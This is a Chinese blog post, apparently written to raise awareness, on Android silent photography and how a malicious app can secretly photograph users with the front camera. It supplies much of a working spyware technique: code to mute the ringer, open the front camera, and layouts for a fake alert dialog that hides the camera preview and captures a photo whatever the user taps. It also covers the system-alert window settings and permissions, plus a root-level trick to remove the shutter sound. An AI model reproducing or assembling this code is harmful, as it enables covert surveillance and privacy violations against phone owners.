之前写过一些android手机root之后的安全问题的(文章列表见末尾),其实我是想到哪就写到了,今天整理硬盘,发现一年之前写过一段代码,所以今天我们就一起来讨论一下。

注:这里不是讨论多nb的技术,而是希望不了解android风险的人了解我们所处的状态

导读:

本文介绍了所谓的静音拍照是如何实现的(当然这也是一种恶意软件,只不过受害的不是用户),和用户自己如何被恶意软件拍照的

由于iteye不允许偷和拍放到一起,所以……静音拍照,大家懂的,静音拍照?不就是……

今天的主题是静音拍照与被拍

当然,这里的“被拍”不是指你拿着手机在地铁上深入女同学裙下的女同学(貌似日本人喜欢干这种事情,自行百度其新闻)

这里指的被拍是:你玩着玩着游戏,突然前置摄像头被恶意应用打开,然后咔嚓,然后……

想要实现这些功能,很遗憾,即是没有root权限也可以

下面我们来说正题

首先说静音拍照

其实也就是说静音拍照嘛,怎么实现?当然是先静音再拍照了……最后记得恢复静音前的状态即可。

有的手机直接调解照相快门音量即可,但是没有通用的api,似乎这种手机也很少(第三方的rom可能会有)

另一个办法就是把手机调成静音模式,然后拍照。不过也不是理想的,有些手机虽然调成了静音模式,但是快门不静音,就像闹钟不静音一样。

还有一些其他的静音方式,这里就不说了。如何把手机调成静音?这个没什么技术含量,大家可自行百度。。。

mAudioManager = (AudioManager) getSystemService(Context.AUDIO_SERVICE);
mAudioManager.setRingerMode(AudioManager.RINGER_MODE_SILENT);

当然,你最好先记录下用户之前的模式

int ringerMode = mAudioManager.getRingerMode();

这样部分手机的静音拍照就搞定了,比如我使用的g14(android 2.3)就可以达到静音的目的了(所以说htc手机操蛋,现在及其反感htc)

下面说一下被拍

被拍呢,我会选择前置摄像头,玩手机的时候一般人不看手机屁股,因为htc嘛

首先说一下android的摄像头

前置摄像头的通用api是在2.3才开始有的,2.2及之前都需要靠反射调用,不过那时有前置摄像头的android手机也很少

这里我们以2.3为基础作为演示

步骤:

0.伪装

1.打开前置摄像头

2.静音+拍照+退出

3.保存

首先来看看如何调用前置摄像头(当然,你得有前置摄像头才行)

mCamera = openCamera(CameraInfo.CAMERA_FACING_FRONT);
public static Camera openCamera(int which) {
return Camera.open(which);
}

如果没Camera不为null,那么就是成功了

最关键的是伪装,android系统中,调用摄像头必须要有预览画面才行,当然,这也是为了安全

所以拍照时必须有一个窗口,也就是你玩着玩着游戏的时候,突然弹出个窗口给你拍个大头贴

用户看到预览画面了,那傻子都知道他被人黑了,所以病毒不能这么傻,它会给自己穿件外套

我做了一件粗糙的外套来给大家演示


当然这个外套比较烂,真正的病毒会做一个很精致,并且比较常见的外套(这样成功率才会高,如果用户手机根本没有股票软件,而我却弹出这么一个对话框,用户再傻也会知道自己中毒了)

下面的操作,无论用户点击确定、取消还是back键,病毒都会拍一张照片然后保存,然后……

camera.xml对应的代码

<?xml version="1.0" encoding="utf-8"?>
<FrameLayout xmlns:android="http://schemas.android.com/apk/res/android"
android:orientation="vertical"
android:layout_width="300dp"
android:layout_height="150dp"
android:background="@color/canvas_background">
<LinearLayout
android:layout_width="wrap_content"
android:layout_height="wrap_content">
<SurfaceView
android:layout_width="wrap_content"
android:layout_height="wrap_content"
android:id="@+id/alert_camera"/>
</LinearLayout>
<include layout="@layout/fake"/>
</FrameLayout>

fake.xml对应的代码

<?xml version="1.0" encoding="utf-8"?>
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
android:layout_width="fill_parent"
android:layout_height="fill_parent"
android:orientation="vertical">
<!-- title -->
<LinearLayout
android:layout_width="fill_parent"
android:layout_height="wrap_content"
android:layout_weight=""
android:layout_gravity="center_vertical"
android:background="@color/canvas_background">
<ImageView
android:layout_width="wrap_content"
android:layout_height="wrap_content"
android:layout_margin="10dp"
android:src="@drawable/ic_dialog_alert"/>
<TextView
android:layout_width="wrap_content"
android:layout_height="wrap_content"
android:layout_marginTop="10dp"
android:layout_marginBottom="10dp"
android:id="@+id/alert_title"
android:text="@string/alert_title"
android:textSize="22sp">
</TextView>
</LinearLayout>
<!-- line -->
<!-- message -->
<LinearLayout
android:layout_width="fill_parent"
android:layout_height="wrap_content"
android:layout_weight=""
android:layout_gravity="center_vertical"
android:background="@color/canvas_background">
<TextView
android:layout_width="wrap_content"
android:layout_height="wrap_content"
android:layout_margin="10dp"
android:id="@+id/alert_message"
android:text="@string/alert_message"
android:textSize="18sp">
</TextView>
</LinearLayout>
<!-- line -->
<!-- button -->
<LinearLayout
android:layout_width="fill_parent"
android:layout_height="wrap_content"
android:orientation="horizontal"
android:layout_weight=""
android:background="@color/button_background">
<Button
android:layout_width="wrap_content"
android:layout_height="wrap_content"
android:layout_weight=""
android:id="@+id/alert_ok"
android:text="@string/alert_ok"/>
<Button
android:layout_width="wrap_content"
android:layout_height="wrap_content"
android:layout_weight=""
android:id="@+id/alert_cancel"
android:text="@string/alert_cancel"/>
</LinearLayout>
</LinearLayout>

ic_dialog_alert.png就是上图显示的叹号,在frameworks/base/core/res下面就有,复制出来一个就行

上面只是布局代码,我们的activity也需要做一些设置,比如在manifest里要设置主题为

android:theme="@android:style/Theme.Dialog"

在onCreate里面要设置下面这些属性,我就不一一解释了

requestWindowFeature(Window.FEATURE_NO_TITLE);
Window window = getWindow();
window.setFormat(PixelFormat.TRANSLUCENT);
window.setType(WindowManager.LayoutParams.TYPE_SYSTEM_ALERT);
window.setFlags(WindowManager.LayoutParams.FLAG_FULLSCREEN,
WindowManager.LayoutParams.FLAG_FULLSCREEN);
setContentView(R.layout.camera);

到这里,关键的地方就都完成了

manifest中还需要配置一些权限

<uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" />
<uses-permission android:name="android.permission.CAMERA" />
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>

正常的拍照流程代码网上很多,我也不贴了,最后附上的colors.xml文件吧

<resources>
<color name="button_background">#ffffff</color>
<color name="canvas_background">#ffffffcc</color>
</resources>

最后再说两句,如果有了root权限,那么病毒就可以替换快门声的音频文件,或者数据库存储指向快门声音的Uri,这样就能彻底的实现静音拍照了

当然,你想静音拍照别人,没准你也被别人静音拍照了,自重

Android安全问题 静音拍照与被拍的更多相关文章

  1. android安全问题(八)伪造短信(利用原生android4.0漏洞)

    导读:本文利用android4.0的一个原生漏洞来伪造短信.无须声明任何权限即可伪造发送方为任何号码的短信给用户. android4.0发布已经是很久很久很久很久以前的事情了,这个漏洞早就报了出来,之 ...

  2. Android安全问题 抢先拦截短信

    同上篇文章一样,这里只陈述结果,代码分析稍后给出 导读:本文叙述如何先于某些伪杀毒软件.病毒.常规软件获取到短信 众所周知,android系统在收到短信息的时候会发送广播,但是此广播是有序广播,也就是 ...

  3. Android安全问题 抢先接收广播 - 内因篇之广播发送流程

    导读:本文说明系统发送广播的部分流程,如何利用Intent查找到对应接收器.我们依然只关注接收器的排序问题 这篇文章主要是针对我前两篇文章 android安全问题(四) 抢先开机启动 - 结果篇 an ...

  4. Android安全问题 抢先接收广播 - 内因篇之广播接收器注册流程

    导读:本文说明系统是如何注册动态广播以及静态广播,这里主要注意其注册的顺序 这篇文章主要是针对我前两篇文章 android安全问题  抢先开机启动 - 结果篇 android安全问题  抢先拦截短信 ...

  5. Android安全问题 钓鱼程序

    导读:文本介绍一种钓鱼应用,讲述如何骗取用户的用户名和密码,无须root 这个话题是继续android安全问题(二) 程序锁延伸的 之前我已经展示了如何制作程序锁.当打开指定应用的时候,弹出一个密码页 ...

  6. Android使得手机拍照功能的发展(源共享)

    Android系统调用手机拍照功能有两种方法来直接调用手机自带摄像头还有一个就是要当心自己的节拍. 例Camera360 强大的一个在每个操作系统都有一个手机摄影软件:您可以捕捉不同风格,不同特效的照 ...

  7. Xamarin开发Android笔记:拍照或相册选取图片角度问题

    在开发Android应用的时候,可能会遇到类似微信朋友圈中拍照或相册选取图片的场景,拍照或选取图片之后在显示的时候却发现图片的角度不对,明明是竖版拍照,显示出来缺失躺着的. 这是因为在某些特定手机上例 ...

  8. Android调用相册拍照控件实现系统控件缩放切割图片

    android 下如果做处理图片的软件 可以调用系统的控件 实现缩放切割图片 非常好的效果 今天写了一个demo分享给大家 package cn.m15.test; import java.io.By ...

  9. Android Camera进行拍照

    Android应用提供了Camera来控制拍照,使用Camera进行拍照的步骤: 1.调用Camera的open()方法打开相机. 2.调用Camera的getParameters()方法获取拍照参数 ...

随机推荐

  1. The C in C++

    1 unnamed arguments in the argument list of the function definition (Page 114) In c++, an argument m ...

  2. 3月3日(3) Binary Tree Preorder Traversal

    原题 Binary Tree Preorder Traversal 没什么好说的... 二叉树的前序遍历,当然如果我一样忘记了什么是前序遍历的..  啊啊.. 总之,前序.中序.后序,是按照根的位置来 ...

  3. Linux ---> 简单socket

    #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <string.h> ...

  4. DEDECMS中,获取当前栏目名称

    获取当前栏目名称 {dede:field name='typeurl' function=”GetTypeName(@me)”/} 指的是当前栏目的URL地址 {dede:field name='ty ...

  5. 译文:Javascript-Functions

    个人理解+google翻译+有道翻译.如有错误,请指正.原文来自MDN:Functions Functions是javascript基本构建模块之一.每一个function是一个javascript程 ...

  6. javascript的setTimeout以及setInterval休眠问题。

    前端码农们在做项目中时候,必定不可少的需要做到轮播效果.但是有些特殊的需求,比如: 需要做到第一个容器内容轮播滚动之后,第二个容器内部再轮播滚动,再第三个容器内容轮播滚动. 这时候我的一开始的思路是: ...

  7. mysql实例 保存查询结果到变量

    本文介绍下,一个mysql的例子,将查询到的数据结果保存到一个变量中.有需要的朋友可以参考下. 本代码演示: 将mysql查询结果保存到变量中的方法. 代码: view source print? 0 ...

  8. CCNP第三天 EIGRP综合实验

    实验题如图所示:其中R2连R3 R5为快速以太网线,其他均为串线,帧中继默认是富曼斯(全连网状结构),即所有接入的路由之间的PVC都已经打通,所有  要关闭R5和R8的逆向arp功能,来手工配置R5到 ...

  9. python自定义线程池

    关于python的多线程,由与GIL的存在被广大群主所诟病,说python的多线程不是真正的多线程.但多线程处理IO密集的任务效率还是可以杠杠的. 我实现的这个线程池其实是根据银角的思路来实现的. 主 ...

  10. PHP+MYSQL 出现乱码的解决方法

    PHP+MYSQL 出现乱码的解决方法 使用PHP+MYSQL时遇到过字符乱问题,解决方法: 在mysql_connect后面加一句SET NAMES UTF8,即可使得UTF8的数据库消除乱码,对于 ...